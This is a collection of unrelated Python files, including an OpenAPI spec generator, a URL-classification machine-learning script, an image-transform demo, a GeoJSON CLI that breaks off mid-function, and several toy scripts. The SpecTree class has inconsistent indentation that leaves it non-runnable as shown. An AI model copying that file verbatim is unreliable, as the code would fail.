    maverage.maverage('mupslist2', 'mups_2.rdb')
#
#---- run elbi_low update
#
    maverage.maverage('elbilist', 'elbi_low.rdb')
    elbi_file = ds_dir + 'elbi_low.rdb'
    maverage.filtersort(elbi_file)
#
#--- clean up
#
    mcf.rm_files('./ccdmlist')
    mcf.rm_files('./pcadlist')
    mcf.rm_files('./mupslist1')
    mcf.rm_files('./mupslist2')
    mcf.rm_files('./elbilist')
#---------------------------------------------------------------------------
#-- make_select_list: write a line if the line contain "word" ---
#---------------------------------------------------------------------------
def make_select_list(f, line, word):
    """
    write a line to f when the line matches "word"
    input:  f    --- writable file object
            line --- a line to check and add
            word --- pattern searched for in the line (re.search semantics)
    output: updated file
    return  True when the line was written, False otherwise
    """
    if re.search(word, line) is None:
        return False
    f.write(line.strip() + '\n')
    return True
#---------------------------------------------------------------------------
if __name__ == "__main__":
    # Entry point: process any new trace-log files into the dataseeker rdb files.
    run_rdb_updates()
|
"""
Utility functions for api module
"""
import re
import smtplib
from email.mime.text import MIMEText
from api.constants import MAIL_HOST, MAIL_PORT
def peek(bucket):
    """
    Get first element of set without removing
    :param bucket: set to peek
    :returns: an arbitrary element of *bucket*, or None when it is empty
    """
    return next(iter(bucket), None)
def has_required(bucket, required):
    """
    Check if all values in required set exist in bucket
    :param bucket: set of values to check
    :param required: set of required values
    :returns bool: True if bucket contains all required
    """
    return bucket >= required
def raise_api_exc(exc, status_code):
    """
    Helper method to raise api exception with status code
    :param exc: exception instance to raise
    :param status_code: HTTP status code attached as ``exc.status_code``
    """
    setattr(exc, "status_code", status_code)
    raise exc
def replace(string, replxs):
    """
    Given a string and a replacement map, it returns the replaced string.
    https://goo.gl/7fcBpE
    :param str string: string to execute replacements on
    :param dict replxs: replacement map {value to find: value to replace}
    :rtype: str
    """
    # Longer keys first so e.g. "abc" wins over its prefix "ab".
    keys_longest_first = sorted(replxs, key=len, reverse=True)
    pattern = re.compile("|".join(re.escape(key) for key in keys_longest_first))

    def _substitute(match):
        return replxs.get(match.group(0), "")

    return pattern.sub(_substitute, string)
def send_mail(sender, recievers, subject, tmpl_file, tmpl_data):
    """
    Send mail using localhost smtp
    :param str sender: email to send from
    :param list recievers: list of emails to send to
    :param str subject: the email subject
    :param str tmpl_file: file path to use as email body template
    :param dict tmpl_data: keys to string replacement for email template
    :returns str: the final message string that was sent
    """
    # (parameter name "recievers" [sic] is kept -- it is part of the API)
    with open(tmpl_file, "r") as fstream:
        msg = MIMEText(fstream.read())
    msg.preamble = subject
    msg["Subject"] = subject
    msg["From"] = sender
    msg["To"] = ", ".join(recievers)
    # Placeholders are substituted over the fully serialized message, so
    # template keys may appear in both the headers and the body.
    msg = replace(msg.as_string(), tmpl_data)
    smtp = smtplib.SMTP(MAIL_HOST, MAIL_PORT)
    smtp.sendmail(sender, recievers, msg)
    smtp.quit()
    return msg
|
"""
Сложность:
1. Худший случай: O(n^2).
2. Лучший случай: O(n * log n).
3. Средний случай: O(n * log n).
Операция разделения массива на две части относительно опорного элемента занимает
время O(n). Поскольку все операции разделения, проделываемые на одной глубине
рекурсии, обрабатывают разные части исходного массива, размер которого постоянен,
суммарно на каждом уровне рекурсии потребуется также O(n) операций. Следовательно,
общая сложность алгоритма определяется лишь количеством разделений, то есть
глубиной рекурсии. Глубина рекурсии, в свою очередь, зависит от сочетания входных
данных и способа определения опорного элемента.
"""
def quick_sort(collection):
    """Recursive quicksort.

    BUG FIX: the previous version popped the pivot off *collection*, silently
    emptying the caller's list.  The pivot is now read (not removed) and the
    partitions are built from a slice, so the input is left intact.

    :param collection: mutable collection of mutually comparable elements.
    :return: list with the elements in ascending order (for inputs of length
             <= 1 the input object itself is returned, as before).
    Examples:
    >>> quick_sort([0, 5, 3, 2, 2])
    [0, 2, 2, 3, 5]
    >>> quick_sort([])
    []
    >>> quick_sort([-2, -5, -45])
    [-45, -5, -2]
    """
    if len(collection) <= 1:
        return collection
    # Last element is used as the pivot (same choice as the original).
    pivot = collection[-1]
    # lesser  - elements <= pivot
    # greater - elements >  pivot
    greater, lesser = [], []
    for element in collection[:-1]:
        if element > pivot:
            greater.append(element)
        else:
            lesser.append(element)
    # Sort both partitions recursively and join them around the pivot.
    return quick_sort(lesser) + [pivot] + quick_sort(greater)
if __name__ == "__main__":
    # Read comma-separated integers from stdin, sort and print them.
    user_input = input("Enter numbers separated by a comma:\n").strip()
    unsorted = [int(item) for item in user_input.split(",")]
    print(quick_sort(unsorted))
|
from collections import defaultdict
from copy import deepcopy
from functools import wraps
from importlib import import_module
from typing import (
Any,
Callable,
Dict,
Mapping,
Optional,
Sequence,
Type,
get_type_hints,
)
from ._types import FunctionDecorator, ModelType, NamingStrategy, NestedNamingStrategy
from .config import Configuration, ModeEnum
from .models import Tag, ValidationError
from .plugins import PLUGINS, BasePlugin
from .response import Response
from .utils import (
default_after_handler,
default_before_handler,
get_model_key,
get_model_schema,
get_nested_key,
get_security,
parse_comments,
parse_name,
parse_params,
parse_request,
parse_resp,
)
class SpecTree:
"""
Interface
:param str backend_name: choose from
('flask', 'quart', 'falcon', 'falcon-asgi', 'starlette')
:param backend: a backend that inherit `SpecTree.plugins.base.BasePlugin`, this will
override the `backend_name` if provided
:param app: backend framework application instance (can be registered later)
:param before: a callback function of the form
:meth:`spectree.utils.default_before_handler`
``func(req, resp, req_validation_error, instance)``
that will be called after the request validation before the endpoint function
:param after: a callback function of the form
:meth:`spectree.utils.default_after_handler`
``func(req, resp, resp_validation_error, instance)``
that will be called after the response validation
:param validation_error_status: The default response status code to use in the
event of a validation error. This value can be overridden for specific endpoints
if needed.
:param kwargs: init :class:`spectree.config.Configuration`, they can also be
configured through the environment variables with prefix `spectree_`
"""
    def __init__(
        self,
        backend_name: str = "base",
        backend: Optional[Type[BasePlugin]] = None,
        app: Any = None,
        before: Callable = default_before_handler,
        after: Callable = default_after_handler,
        validation_error_status: int = 422,
        validation_error_model: Optional[ModelType] = None,
        naming_strategy: NamingStrategy = get_model_key,
        nested_naming_strategy: NestedNamingStrategy = get_nested_key,
        **kwargs: Any,
    ):
        # Strategies used to derive schema names (plain and nested).
        self.naming_strategy = naming_strategy
        self.nested_naming_strategy = nested_naming_strategy
        # Global before/after handlers; may be overridden per endpoint.
        self.before = before
        self.after = after
        # Default status code and model used to report validation errors.
        self.validation_error_status = validation_error_status
        self.validation_error_model = validation_error_model or ValidationError
        # Remaining keyword arguments become the configuration (they can also
        # come from ``spectree_``-prefixed environment variables).
        self.config: Configuration = Configuration.parse_obj(kwargs)
        self.backend_name = backend_name
        # An explicit ``backend`` class takes precedence over ``backend_name``.
        if backend:
            self.backend = backend(self)
        else:
            plugin = PLUGINS[backend_name]
            module = import_module(plugin.name, plugin.package)
            self.backend = getattr(module, plugin.class_name)(self)
        # Registry of models referenced by the spec, keyed by model name.
        self.models: Dict[str, Any] = {}
        if app:
            self.register(app)
def register(self, app: Any):
"""
register to backend application
This will be automatically triggered if the app is passed into the
init step.
"""
self.app = app
self.backend.register_route(self.app)
@property
def spec(self):
"""
get the OpenAPI spec
"""
if not hasattr(self, "_spec"):
self._spec = self._generate_spec()
return self._spec
def bypass(self, func: Callable):
"""
bypass rules for routes (mode defined in config)
:normal: collect all the routes exclude those decorated by other
`SpecTree` instance
:greedy: collect all the routes
:strict: collect all the routes decorated by this instance
"""
if self.config.mode == ModeEnum.greedy:
return False
elif self.config.mode == ModeEnum.strict:
return getattr(func, "_decorator", None) != self
else:
decorator = getattr(func, "_decorator", None)
return bool(decorator and decorator != self)
    def validate(
        self,
        query: Optional[ModelType] = None,
        json: Optional[ModelType] = None,
        form: Optional[ModelType] = None,
        headers: Optional[ModelType] = None,
        cookies: Optional[ModelType] = None,
        resp: Optional[Response] = None,
        tags: Sequence = (),
        security: Any = None,
        deprecated: bool = False,
        before: Optional[Callable] = None,
        after: Optional[Callable] = None,
        validation_error_status: int = 0,
        path_parameter_descriptions: Optional[Mapping[str, str]] = None,
        skip_validation: bool = False,
        operation_id: Optional[str] = None,
    ) -> Callable:
        """
        - validate query, json, headers in request
        - validate response body and status code
        - add tags to this API route
        - add security to this API route
        :param query: `pydantic.BaseModel`, query in uri like `?name=value`
        :param json: `pydantic.BaseModel`, JSON format request body
        :param form: `pydantic.BaseModel`, form-data request body
        :param headers: `pydantic.BaseModel`, if you have specific headers
        :param cookies: `pydantic.BaseModel`, if you have cookies for this route
        :param resp: `spectree.Response`
        :param tags: a tuple of strings or :class:`spectree.models.Tag`
        :param security: dict with security config for current route and method
        :param deprecated: bool, if endpoint is marked as deprecated
        :param before: :meth:`spectree.utils.default_before_handler` for
            specific endpoint
        :param after: :meth:`spectree.utils.default_after_handler` for
            specific endpoint
        :param validation_error_status: The response status code to use for the
            specific endpoint, in the event of a validation error. If not specified,
            the global `validation_error_status` is used instead, defined
            in :meth:`spectree.spec.SpecTree`.
        :param path_parameter_descriptions: A dictionary of path parameter names and
            their description.
        :param skip_validation: bool, forwarded to the backend's ``validate``
            call (the models are still documented in the spec)
        :param operation_id: a string override for operationId for the given endpoint
        """
        # If the status code for validation errors is not overridden on the level of
        # the view function, use the globally set status code for validation errors.
        if validation_error_status == 0:
            validation_error_status = self.validation_error_status
        def decorate_validation(func: Callable):
            # for sync framework
            @wraps(func)
            def sync_validate(*args: Any, **kwargs: Any):
                return self.backend.validate(
                    func,
                    query,
                    json,
                    form,
                    headers,
                    cookies,
                    resp,
                    before or self.before,
                    after or self.after,
                    validation_error_status,
                    skip_validation,
                    *args,
                    **kwargs,
                )
            # for async framework
            @wraps(func)
            async def async_validate(*args: Any, **kwargs: Any):
                return await self.backend.validate(
                    func,
                    query,
                    json,
                    form,
                    headers,
                    cookies,
                    resp,
                    before or self.before,
                    after or self.after,
                    validation_error_status,
                    skip_validation,
                    *args,
                    **kwargs,
                )
            # Pick the wrapper matching the backend's execution model.
            validation: FunctionDecorator = (
                async_validate if self.backend.ASYNC else sync_validate # type: ignore
            )
            if self.config.annotations:
                # Type annotations on the view function override the explicit
                # keyword arguments of this decorator.
                nonlocal query, json, form, headers, cookies
                annotations = get_type_hints(func)
                query = annotations.get("query", query)
                json = annotations.get("json", json)
                form = annotations.get("form", form)
                headers = annotations.get("headers", headers)
                cookies = annotations.get("cookies", cookies)
            # register
            # Attach each model's registry key to the wrapper so the spec
            # generator can reference it later.
            for name, model in zip(
                ("query", "json", "form", "headers", "cookies"),
                (query, json, form, headers, cookies),
            ):
                if model is not None:
                    model_key = self._add_model(model=model)
                    setattr(validation, name, model_key)
            if resp:
                # Make sure that the endpoint specific status code and data model for
                # validation errors shows up in the response spec.
                resp.add_model(
                    validation_error_status, self.validation_error_model, replace=False
                )
                for model in resp.models:
                    self._add_model(model=model)
                validation.resp = resp
            if tags:
                validation.tags = tags
            validation.security = security
            validation.deprecated = deprecated
            validation.path_parameter_descriptions = path_parameter_descriptions
            validation.operation_id = operation_id
            # register decorator
            # Marks ownership so `bypass` can tell instances apart.
            validation._decorator = self
            return validation
        return decorate_validation
def _add_model(self, model: ModelType) -> str:
"""
unified model processing
"""
model_key = self.naming_strategy(model)
self.models[model_key] = deepcopy(
get_model_schema(
model=model,
naming_strategy=self.naming_strategy,
nested_naming_strategy=self.nested_naming_strategy,
)
)
return model_key
    def _generate_spec(self) -> Dict[str, Any]:
        """
        generate OpenAPI spec according to routes and decorators
        """
        routes: Dict[str, Dict] = defaultdict(dict)
        tags = {}
        for route in self.backend.find_routes():
            for method, func in self.backend.parse_func(route):
                # Skip routes excluded by the backend or by this instance's
                # bypass mode.
                if self.backend.bypass(func, method) or self.bypass(func):
                    continue
                path_parameter_descriptions = getattr(
                    func, "path_parameter_descriptions", None
                )
                path, parameters = self.backend.parse_path(
                    route, path_parameter_descriptions
                )
                name = parse_name(func)
                summary, desc = parse_comments(func)
                func_tags = getattr(func, "tags", ())
                # Collect tag metadata once per unique tag name.
                for tag in func_tags:
                    if str(tag) not in tags:
                        tags[str(tag)] = (
                            tag.dict() if isinstance(tag, Tag) else {"name": tag}
                        )
                routes[path][method.lower()] = {
                    "summary": summary or f"{name} <{method}>",
                    "operationId": self.backend.get_func_operation_id(
                        func, path, method
                    ),
                    "description": desc or "",
                    "tags": [str(x) for x in getattr(func, "tags", ())],
                    "parameters": parse_params(func, parameters[:], self.models),
                    "responses": parse_resp(func, self.naming_strategy),
                }
                # Optional per-endpoint attributes set by the validate decorator.
                security = getattr(func, "security", None)
                if security is not None:
                    routes[path][method.lower()]["security"] = get_security(security)
                deprecated = getattr(func, "deprecated", False)
                if deprecated:
                    routes[path][method.lower()]["deprecated"] = deprecated
                request_body = parse_request(func)
                if request_body:
                    routes[path][method.lower()]["requestBody"] = request_body
        # Assemble the top-level OpenAPI document.
        spec: Dict[str, Any] = {
            "openapi": self.config.openapi_version,
            "info": self.config.openapi_info(),
            "tags": list(tags.values()),
            "paths": {**routes},
            "components": {
                "schemas": {**self.models, **self._get_model_definitions()},
            },
        }
        if self.config.servers:
            spec["servers"] = [
                server.dict(exclude_none=True) for server in self.config.servers
            ]
        if self.config.security_schemes:
            spec["components"]["securitySchemes"] = {
                scheme.name: scheme.data.dict(exclude_none=True, by_alias=True)
                for scheme in self.config.security_schemes
            }
        spec["security"] = get_security(self.config.security)
        return spec
def _get_model_definitions(self) -> Dict[str, Any]:
"""
handle nested models
"""
definitions = {}
for name, schema in self.models.items():
if "definitions" in schema:
for key, value in schema["definitions"].items():
composed_key = self.nested_naming_strategy(name, key)
if composed_key not in definitions:
definitions[composed_key] = value
del schema["definitions"]
return definitions
|
from _typeshed import Incomplete
# Type stubs (no runtime bodies) for networkx's random intersection graph
# generators; `seed` follows networkx's usual optional-RNG convention.
def uniform_random_intersection_graph(n, m, p, seed: Incomplete | None = None): ...
def k_random_intersection_graph(n, m, k, seed: Incomplete | None = None): ...
def general_random_intersection_graph(n, m, p, seed: Incomplete | None = None): ...
|
from django.shortcuts import render
import requests
# Create your views here.
def HomeView(request):
    """Render the project home page with an empty template context."""
    context = {}
    return render(request, 'project/home.html', context)
|
import cv2, os
import math
import numpy as np

# Switch the working directory to the folder holding the DIP3E sample images.
os.chdir(r'D:\application\Coding\Image Processing\CH03\DIP3E_CH03_Original_Images\DIP3E_Original_Images_CH03')
if os.getcwd() == r'D:\application\Coding\Image Processing\CH03\DIP3E_CH03_Original_Images\DIP3E_Original_Images_CH03':
    print('Transformation Function:\n1. inverse\n2. logarithmic\n3. idempotent\n')
    trans_type = input('Choose: ')
    # Load the image as grayscale (flag 0).
    img = cv2.imread('Fig0304(a)(breast_digital_Xray).tif', 0)
    if trans_type == '1':  # negative (inverse) transform: s = 255 - r
        # Bug fix: the original lambda ended with a stray line-continuation
        # backslash, which fused the next statement into it (SyntaxError).
        new_img = 255 - img
    elif trans_type == '2':  # log transform: s = c * log(1 + r)
        # c scales log(256) = 8*log(2) back to the full 255 range.
        c = 255 / math.log(2) / 8
        new_img = img.astype('int32') + 1  # avoid log(0)
        new_img = (np.log(new_img) * c).astype('uint8')
    elif trans_type == '3':  # power-law (gamma) transform: s = r**d / 255**(d-1)
        degree = float(input('\nDegree: '))  # gamma exponent
        new_img = (img.astype('int32') ** degree / (255 ** (degree - 1))).astype('uint8')
    else:  # invalid menu choice
        print('Invalid Input')
        exit()
    # Bug fix: the original re-assigned new_img = img.copy().fill(0) here,
    # which both discarded the transform result and set new_img to None
    # (ndarray.fill returns None), crashing imshow.
    cv2.imshow('New Img', new_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
|
"""
Minimal setup for listmycmds
"""
DEPENDENCIES = ['argh']
from setuptools import setup, find_packages
setup(name='listmycmds',
version='1.0',
py_modules=['listmycmds_for_setup', 'listmycmds'],
entry_points={'console_scripts': ['listmycmds=listmycmds_for_setup:main']},
install_requires=DEPENDENCIES
)
|
from pycoingecko import CoinGeckoAPI
import pandas as pd
pd.set_option('float_format', '{:.5f}'.format)
#---------------------------- API Call
cg = CoinGeckoAPI()
#---------------------------- Get Data
def crypto_data(crypto):
    """Fetch one year of daily market data for a coin from CoinGecko.

    :param crypto: coin ticker symbol as listed by CoinGecko, e.g. ``'btc'``
    :return: ``pandas.DataFrame`` indexed by date (from the epoch-second
        timestamps) with columns ``Close``, ``Volume`` and ``V_to_M``
        (volume-to-market-cap ratio, +1 smoothing on both terms)
    :raises IndexError: if the symbol is unknown to CoinGecko
    """
    # Resolve the ticker symbol to CoinGecko's coin id.
    coins = pd.DataFrame(cg.get_coins_list())
    coin_id = coins['id'].loc[coins['symbol'] == crypto].values[0]
    # Bug fix: the original ran `exec("%s = %d" % (crypto, 2))` and returned
    # through `vars()[crypto]` — an injection-prone no-op; build and return
    # the frame directly instead.
    chart = cg.get_coin_market_chart_by_id(id=coin_id, vs_currency='usd', days=365)
    prices = [p[1] for p in chart['prices']]
    timestamps = [int(p[0] / 1000) for p in chart['prices']]  # ms -> s
    volumes = [v[1] for v in chart['total_volumes']]
    # +1 on both terms avoids division by zero for tiny/new coins.
    volume_to_marketcap = [
        (chart['total_volumes'][i][1] + 1) / (chart['market_caps'][i][1] + 1)
        for i in range(len(chart['market_caps']))
    ]
    df = pd.DataFrame({'Date': timestamps,
                       'Close': prices,
                       'Volume': volumes,
                       'V_to_M': volume_to_marketcap})
    df.index = pd.to_datetime(df['Date'], unit='s')
    return df.drop(columns=['Date'])
|
import os
import sys
import re
import random
import math
import matplotlib
import pandas as pd
import numpy as np
import ipaddress as ip
from os.path import split
from urllib.parse import urlparse
import matplotlib.pyplot as plt
import sklearn.ensemble as ek
from sklearn.model_selection import train_test_split
from sklearn.feature_selection import SelectFromModel
from sklearn import model_selection, tree, linear_model
from sklearn.externals import joblib
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.tree import tree, DecisionTreeClassifier
from sklearn.naive_bayes import MultinomialNB, GaussianNB
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn import metrics
from sklearn.pipeline import make_pipeline
from sklearn import preprocessing
from sklearn import svm
from sklearn.feature_selection import SelectKBest
from sklearn.linear_model import LogisticRegression
#matplotlib inline
#custom tokenizer for URLs.
#first split - "/"
#second split - "-"
#third split - "."
#remove ".com" (also "http://", but we dont have "http://" in our dataset)
def getTokens(input):
    """Tokenize a URL for TF-IDF: split on '/', then '-', then '.',
    deduplicate, and drop the uninformative 'com' token.

    Bug fix: the original wrapped the text in ``str(x.encode('utf-8'))``,
    which stringifies a bytes object and injects a literal ``b'`` prefix
    (and trailing ``'``) into the first and last tokens.
    """
    tokensBySlash = str(input).split('/')
    allTokens = []
    for part in tokensBySlash:
        tokens = part.split('-')
        tokensByDot = []
        for token in tokens:
            tokensByDot.extend(token.split('.'))
        allTokens.extend(tokens)
        allTokens.extend(tokensByDot)
    # Deduplicate (order is not significant for the vectorizer).
    allTokens = list(set(allTokens))
    if 'com' in allTokens:
        allTokens.remove('com')
    return allTokens
#function to remove "http://" from URL
def trim(url):
    """Strip the scheme and subdomains, returning the registered domain.

    Bug fix: the original character class ``[a-zA-Z-1-9]`` omitted the
    digit ``0``, so domains containing '0' failed to match correctly.
    """
    return re.match(r'(?:\w*://)?(?:.*\.)?([a-zA-Z0-9-]*\.[a-zA-Z]{1,}).*', url).groups()[0]
# ---------------------------------------------------------------------------
# Data loading and preparation
# ---------------------------------------------------------------------------
df = pd.read_csv(r'C:\Users\Kephas\Desktop\FinalProject\dataset.csv', ',',
                 error_bad_lines=False)
# Shuffle once (the original shuffled three separate times) and reset the index.
df = df.sample(frac=1).reset_index(drop=True)
data = np.array(df)
random.shuffle(data)
# Column 0 is the URL, column 1 the label.
y = [d[1] for d in data]
corpus = [d[0] for d in data]
# Vectorize the URLs with the custom URL tokenizer.
vectorizer = TfidfVectorizer(tokenizer=getTokens)
X = vectorizer.fit_transform(corpus)
# Hold out 20% of the data for evaluation.
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,
                                                    random_state=100)
def _evaluate(name, clf):
    """Fit *clf*, print accuracy, error rates and the classification report,
    and draw an annotated confusion-matrix heat map. Returns the fitted
    classifier. (Replaces three copy-pasted blocks; also fixes the NB plot,
    which was mislabelled 'Decision Tree'.)"""
    clf.fit(X_train, y_train)
    print("Accuracy for %s" % name, clf.score(X_test, y_test))
    predicted = clf.predict(X_test)
    cm = confusion_matrix(y_test, predicted)
    print(cm)
    print("False positive rate : %.2f %%" % ((cm[0][1] / float(sum(cm[0]))) * 100))
    print("False negative rate : %.2f %%" % ((cm[1][0] / float(sum(cm[1]))) * 100))
    print(classification_report(y_test, predicted))
    # Confusion-matrix heat map annotated with TN/FP/FN/TP counts.
    plt.clf()
    plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Wistia)
    plt.title('Confusion Matrix for %s' % name)
    classNames = ['Negative', 'Positive']
    plt.xlabel('Predicted label')
    plt.ylabel('True label')
    tick_marks = np.arange(len(classNames))
    plt.xticks(tick_marks, classNames, rotation=45)
    plt.yticks(tick_marks, classNames)
    quadrant = [['TN', 'FP'], ['FN', 'TP']]
    for i in range(2):
        for j in range(2):
            plt.text(j, i, str(quadrant[i][j]) + " = " + str(cm[i][j]))
    plt.show()
    return clf

lgr = _evaluate("Logistic Regression", LogisticRegression())
Dt = _evaluate("Decision Tree", DecisionTreeClassifier())
NB = _evaluate("MNB", MultinomialNB())
# ---------------------------------------------------------------------------
# Final head-to-head comparison on a fresh 50/50 split
# ---------------------------------------------------------------------------
model = { "DecisionTree":tree.DecisionTreeClassifier(max_depth=10),
          "MNB":MultinomialNB(),
          "LogisticRegression":LogisticRegression()
}
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y ,test_size=0.5)
results = {}
for algo in model:
    clf = model[algo]
    clf.fit(X_train,y_train)
    score = clf.score(X_test,y_test)
    print ("%s : %.3f " % (algo, score))
    results[algo] = score
winner = max(results, key=results.get)
print("Best algorithm: ", winner)
|
# Reverse Maker
# Done
# By Efrain
# Repeatedly read a word and print it reversed.
while True:
    word = input("Enter A Word To Be Flipped: ")
    print(word[::-1])
|
def login(ac, id, pw):
    """Attempt a login against *ac*, a dict mapping id -> password.

    Prints (in Korean) one of: login succeeded, wrong password, or
    unregistered id.
    """
    if id not in ac:
        print("등록되지 않은 아이디입니다.")
    elif pw == ac[id]:
        print("%s님이 로그인했습니다."%id)
    else:
        print("비밀번호가 다릅니다.")
account = {"pomin615":"0123", "thdehdduf20":"4567"}
uid = input("ID : ")
upw = input("PW : ")
login(account,uid,upw)
|
# Swap every "apple" with "peach" using "NULL" as a placeholder token.
text = input()
text = text.replace("apple","NULL").replace("peach", "apple").replace("NULL", "peach")
print(text)
|
from functools import partial
import itertools
import json
import logging
import sys
import warnings
import click
from cligj import (
compact_opt, files_in_arg, indent_opt,
sequence_opt, precision_opt, use_rs_opt)
import fiona
from fiona.transform import transform_geom
from .helpers import obj_gen
from . import options
FIELD_TYPES_MAP_REV = dict([(v, k) for k, v in fiona.FIELD_TYPES_MAP.items()])
warnings.simplefilter('default')
def make_ld_context(context_items):
    """Return a JSON-LD Context object for GeoJSON output.

    *context_items* is an optional iterable of ``"term=URI"`` strings;
    each is merged into the returned mapping.
    See http://json-ld.org/spec/latest/json-ld.
    """
    ctx = {
        "@context": {
            "geojson": "http://ld.geojson.org/vocab#",
            "Feature": "geojson:Feature",
            "FeatureCollection": "geojson:FeatureCollection",
            "GeometryCollection": "geojson:GeometryCollection",
            "LineString": "geojson:LineString",
            "MultiLineString": "geojson:MultiLineString",
            "MultiPoint": "geojson:MultiPoint",
            "MultiPolygon": "geojson:MultiPolygon",
            "Point": "geojson:Point",
            "Polygon": "geojson:Polygon",
            "bbox": {
                "@container": "@list",
                "@id": "geojson:bbox"
            },
            "coordinates": "geojson:coordinates",
            "datetime": "http://www.w3.org/2006/time#inXSDDateTime",
            "description": "http://purl.org/dc/terms/description",
            "features": {
                "@container": "@set",
                "@id": "geojson:features"
            },
            "geometry": "geojson:geometry",
            "id": "@id",
            "properties": "geojson:properties",
            "start": "http://www.w3.org/2006/time#hasBeginning",
            "stop": "http://www.w3.org/2006/time#hasEnding",
            "title": "http://purl.org/dc/terms/title",
            "type": "@type",
            "when": "geojson:when"
        }
    }
    # Merge user-supplied "term=URI" pairs into the top-level mapping.
    for item in context_items or []:
        term, uri = item.split("=")
        ctx[term.strip()] = uri.strip()
    return ctx
def id_record(rec):
    """Rewrite *rec*'s ``id`` as a JSON-LD blank-node id and return *rec*
    (mutated in place)."""
    rec["id"] = "_:f{}".format(rec["id"])
    return rec
# Cat command
@click.command(short_help="Concatenate and print the features of datasets")
@files_in_arg
@precision_opt
@indent_opt
@compact_opt
@click.option('--ignore-errors/--no-ignore-errors', default=False,
              help="log errors but do not stop serialization.")
@options.dst_crs_opt
@use_rs_opt
@click.option('--bbox', default=None, metavar="w,s,e,n",
              help="filter for features intersecting a bounding box")
@click.pass_context
def cat(ctx, files, precision, indent, compact, ignore_errors, dst_crs,
        use_rs, bbox):
    """Concatenate and print the features of input datasets as a
    sequence of GeoJSON features."""
    verbosity = (ctx.obj and ctx.obj['verbosity']) or 2
    logger = logging.getLogger('fio')
    dump_kwds = {'sort_keys': True}
    if indent:
        dump_kwds['indent'] = indent
    if compact:
        dump_kwds['separators'] = (',', ':')
    # NOTE(review): item_sep is assigned but never used in this command.
    item_sep = compact and ',' or ', '
    try:
        with fiona.drivers(CPL_DEBUG=verbosity>2):
            for path in files:
                with fiona.open(path) as src:
                    if bbox:
                        # Accept either "w,s,e,n" or a JSON array string.
                        try:
                            bbox = tuple(map(float, bbox.split(',')))
                        except ValueError:
                            bbox = json.loads(bbox)
                    for i, feat in src.items(bbox=bbox):
                        # Reproject and/or round coordinates when requested.
                        if dst_crs or precision > 0:
                            g = transform_geom(
                                src.crs, dst_crs, feat['geometry'],
                                antimeridian_cutting=True,
                                precision=precision)
                            feat['geometry'] = g
                            feat['bbox'] = fiona.bounds(g)
                        if use_rs:
                            # ASCII record separator for RS-delimited output.
                            click.echo(u'\u001e', nl=False)
                        click.echo(json.dumps(feat, **dump_kwds))
    except Exception:
        logger.exception("Exception caught during processing")
        raise click.Abort()
# Collect command
@click.command(short_help="Collect a sequence of features.")
@precision_opt
@indent_opt
@compact_opt
@click.option('--record-buffered/--no-record-buffered', default=False,
              help="Economical buffering of writes at record, not collection "
                   "(default), level.")
@click.option('--ignore-errors/--no-ignore-errors', default=False,
              help="log errors but do not stop serialization.")
@options.src_crs_opt
@click.option('--with-ld-context/--without-ld-context', default=False,
              help="add a JSON-LD context to JSON output.")
@click.option('--add-ld-context-item', multiple=True,
              help="map a term to a URI and add it to the output's JSON LD context.")
@click.pass_context
def collect(ctx, precision, indent, compact, record_buffered, ignore_errors,
            src_crs, with_ld_context, add_ld_context_item):
    """Make a GeoJSON feature collection from a sequence of GeoJSON
    features and print it."""
    verbosity = (ctx.obj and ctx.obj['verbosity']) or 2
    logger = logging.getLogger('fio')
    stdin = click.get_text_stream('stdin')
    sink = click.get_text_stream('stdout')
    dump_kwds = {'sort_keys': True}
    if indent:
        dump_kwds['indent'] = indent
    if compact:
        dump_kwds['separators'] = (',', ':')
    item_sep = compact and ',' or ', '
    # Reproject to WGS84 only when a source CRS is given; otherwise pass
    # geometries through unchanged.
    if src_crs:
        transformer = partial(transform_geom, src_crs, 'EPSG:4326',
                              antimeridian_cutting=True, precision=precision)
    else:
        transformer = lambda x: x
    first_line = next(stdin)
    # If input is RS-delimited JSON sequence.
    if first_line.startswith(u'\x1e'):
        def feature_gen():
            # Accumulate text between ASCII RS (0x1e) markers; each buffered
            # chunk is one feature document.
            buffer = first_line.strip(u'\x1e')
            for line in stdin:
                if line.startswith(u'\x1e'):
                    if buffer:
                        feat = json.loads(buffer)
                        feat['geometry'] = transformer(feat['geometry'])
                        yield feat
                    buffer = line.strip(u'\x1e')
                else:
                    buffer += line
            else:
                # Flush the final buffered feature at EOF.
                feat = json.loads(buffer)
                feat['geometry'] = transformer(feat['geometry'])
                yield feat
    else:
        def feature_gen():
            # Plain LF-delimited sequence: one feature per line.
            feat = json.loads(first_line)
            feat['geometry'] = transformer(feat['geometry'])
            yield feat
            for line in stdin:
                feat = json.loads(line)
                feat['geometry'] = transformer(feat['geometry'])
                yield feat
    try:
        source = feature_gen()
        if record_buffered:
            # Buffer GeoJSON data at the feature level for smaller
            # memory footprint.
            indented = bool(indent)
            rec_indent = "\n" + " " * (2 * (indent or 0))
            collection = {
                'type': 'FeatureCollection',
                'features': [] }
            if with_ld_context:
                collection['@context'] = make_ld_context(
                    add_ld_context_item)
            # Split the serialized skeleton at the empty features array so
            # features can be streamed in between head and tail.
            head, tail = json.dumps(collection, **dump_kwds).split('[]')
            sink.write(head)
            sink.write("[")
            # Try the first record.
            try:
                i, first = 0, next(source)
                if with_ld_context:
                    first = id_record(first)
                if indented:
                    sink.write(rec_indent)
                sink.write(
                    json.dumps(first, **dump_kwds
                        ).replace("\n", rec_indent))
            except StopIteration:
                pass
            except Exception as exc:
                # Ignoring errors is *not* the default.
                if ignore_errors:
                    logger.error(
                        "failed to serialize file record %d (%s), "
                        "continuing",
                        i, exc)
                else:
                    # Log error and close up the GeoJSON, leaving it
                    # more or less valid no matter what happens above.
                    logger.critical(
                        "failed to serialize file record %d (%s), "
                        "quiting",
                        i, exc)
                    sink.write("]")
                    sink.write(tail)
                    if indented:
                        sink.write("\n")
                    raise
            # Because trailing commas aren't valid in JSON arrays
            # we'll write the item separator before each of the
            # remaining features.
            for i, rec in enumerate(source, 1):
                try:
                    if with_ld_context:
                        rec = id_record(rec)
                    if indented:
                        sink.write(rec_indent)
                    sink.write(item_sep)
                    sink.write(
                        json.dumps(rec, **dump_kwds
                            ).replace("\n", rec_indent))
                except Exception as exc:
                    if ignore_errors:
                        logger.error(
                            "failed to serialize file record %d (%s), "
                            "continuing",
